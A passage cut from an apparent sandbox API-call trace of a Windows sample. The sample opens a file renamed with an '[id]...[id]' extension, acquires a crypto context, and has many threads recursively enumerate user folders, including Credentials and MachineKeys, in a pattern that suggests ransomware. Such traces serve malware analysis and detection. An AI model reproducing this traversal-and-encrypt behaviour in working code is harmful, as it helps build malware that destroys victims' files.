"c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x888 [0061.291] CreateFileMappingA (hFile=0x888, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0061.292] CryptAcquireContextA (phProv=0x2344fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 523 os_tid = 0xc70 [0047.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x2358fd30 | out: lpFindFileData=0x2358fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 524 os_tid = 0xc74 [0047.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*", lpFindFileData=0x236cfd30 | out: lpFindFileData=0x236cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8490 [0047.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.480] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x236cfd30 | out: lpFindFileData=0x236cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.480] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.480] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x236cfd30 | out: lpFindFileData=0x236cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0047.480] lstrcmpW (lpString1=".", lpString2="CryptnetUrlCache") returned -1 [0047.481] lstrcmpW (lpString1="..", lpString2="CryptnetUrlCache") returned -1 [0047.481] lstrcmpiW (lpString1="windows", lpString2="CryptnetUrlCache") returned 1 [0047.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*" [0047.481] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*") returned 51 [0047.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\", lpString2="CryptnetUrlCache" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0047.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0047.481] GlobalMemoryStatus (in: lpBuffer=0x236cfd10 | out: lpBuffer=0x236cfd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11561460, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x320 [0048.404] CloseHandle (hObject=0x320) returned 1 [0048.404] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x236cfd30 | out: lpFindFileData=0x236cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 0 [0048.404] FindClose (in: hFindFile=0x5d8490 | out: hFindFile=0x5d8490) returned 1 Thread: id = 525 os_tid = 0xc78 [0047.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x2380fd30 | out: lpFindFileData=0x2380fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8890 [0047.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.482] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x2380fd30 | out: lpFindFileData=0x2380fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.482] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.482] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x2380fd30 | out: lpFindFileData=0x2380fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0047.482] lstrcmpW (lpString1=".", lpString2="1.0") returned -1 [0047.482] lstrcmpW (lpString1="..", lpString2="1.0") returned -1 [0047.482] lstrcmpiW (lpString1="windows", lpString2="1.0") returned 1 [0047.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*" [0047.482] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*") returned 54 [0047.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\", lpString2="1.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0047.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*" [0047.482] GlobalMemoryStatus (in: lpBuffer=0x2380fd10 | out: lpBuffer=0x2380fd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ba028, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a8 [0048.404] CloseHandle (hObject=0x4a8) returned 1 [0048.405] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x2380fd30 | out: lpFindFileData=0x2380fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 0 [0048.405] FindClose (in: hFindFile=0x5d8890 | out: hFindFile=0x5d8890) returned 1 Thread: id = 526 os_tid = 0xc7c [0047.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*.*", lpFindFileData=0x2394fd30 | out: lpFindFileData=0x2394fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 527 os_tid = 0xc80 [0047.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*", lpFindFileData=0x23a8fd30 | out: lpFindFileData=0x23a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671df0 [0047.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.801] FindNextFileW (in: hFindFile=0x671df0, lpFindFileData=0x23a8fd30 | out: lpFindFileData=0x23a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.801] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.801] FindNextFileW (in: hFindFile=0x671df0, lpFindFileData=0x23a8fd30 | out: lpFindFileData=0x23a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0047.801] lstrcmpW (lpString1=".", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned -1 [0047.801] lstrcmpW (lpString1="..", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned -1 [0047.801] lstrcmpiW (lpString1="windows", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 1 [0049.154] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*" [0049.154] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*") returned 51 [0049.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0049.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*.*" [0049.154] GlobalMemoryStatus (in: lpBuffer=0x23a8fd10 | out: lpBuffer=0x23a8fd10) [0049.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24dfebf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0049.162] CloseHandle (hObject=0x3bc) returned 1 [0049.162] FindNextFileW (in: hFindFile=0x671df0, lpFindFileData=0x23a8fd30 | out: lpFindFileData=0x23a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0049.162] FindClose (in: hFindFile=0x671df0 | out: hFindFile=0x671df0) returned 1 Thread: id = 528 os_tid = 0xc84 [0047.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x23bcfd30 | out: lpFindFileData=0x23bcfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8710 [0047.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.484] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x23bcfd30 | out: lpFindFileData=0x23bcfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.484] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.484] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x23bcfd30 | out: lpFindFileData=0x23bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0047.485] lstrcmpW (lpString1=".", lpString2="MachineKeys") returned -1 [0047.485] lstrcmpW (lpString1="..", lpString2="MachineKeys") returned -1 [0047.485] lstrcmpiW (lpString1="windows", lpString2="MachineKeys") returned 1 [0047.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" [0047.485] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned 47 [0047.485] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\", lpString2="MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0047.485] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*" [0047.485] GlobalMemoryStatus (in: lpBuffer=0x23bcfd10 | out: lpBuffer=0x23bcfd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0048.407] CloseHandle (hObject=0x700) returned 1 [0048.407] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x23bcfd30 | out: lpFindFileData=0x23bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0048.407] FindClose (in: hFindFile=0x5d8710 | out: hFindFile=0x5d8710) returned 1 Thread: id = 529 os_tid = 0xc88 [0047.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*", lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3130 [0047.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.800] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.801] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.801] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0047.801] lstrcmpW (lpString1=".", lpString2="Credentials") returned -1 [0047.801] lstrcmpW (lpString1="..", lpString2="Credentials") returned -1 [0047.801] lstrcmpiW (lpString1="windows", lpString2="Credentials") returned 1 [0049.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0049.133] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned 50 [0049.133] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials" [0049.133] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*.*" [0049.133] GlobalMemoryStatus (in: lpBuffer=0x23d0fd10 | out: lpBuffer=0x23d0fd10) [0049.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11273fc8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0049.134] CloseHandle (hObject=0x2c0) returned 1 [0049.134] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0049.134] lstrcmpW (lpString1=".", lpString2="Crypto") returned -1 [0049.134] lstrcmpW (lpString1="..", lpString2="Crypto") returned -1 [0049.134] lstrcmpiW (lpString1="windows", lpString2="Crypto") returned 1 [0049.134] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0049.134] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned 50 [0049.134] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto" [0049.134] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*" [0049.134] GlobalMemoryStatus (in: lpBuffer=0x23d0fd10 | out: lpBuffer=0x23d0fd10) [0049.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c9e868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0049.135] CloseHandle (hObject=0x2c0) returned 1 [0049.135] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0049.135] lstrcmpW (lpString1=".", lpString2="Internet Explorer") returned -1 [0049.135] lstrcmpW (lpString1="..", lpString2="Internet Explorer") returned -1 [0049.135] lstrcmpiW (lpString1="windows", lpString2="Internet Explorer") returned 1 [0049.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0049.138] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned 50 [0049.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0049.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*" [0049.138] GlobalMemoryStatus (in: lpBuffer=0x23d0fd10 | out: lpBuffer=0x23d0fd10) [0049.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24db6ab8, dwCreationFlags=0x0, lpThreadId=0x0 | out: 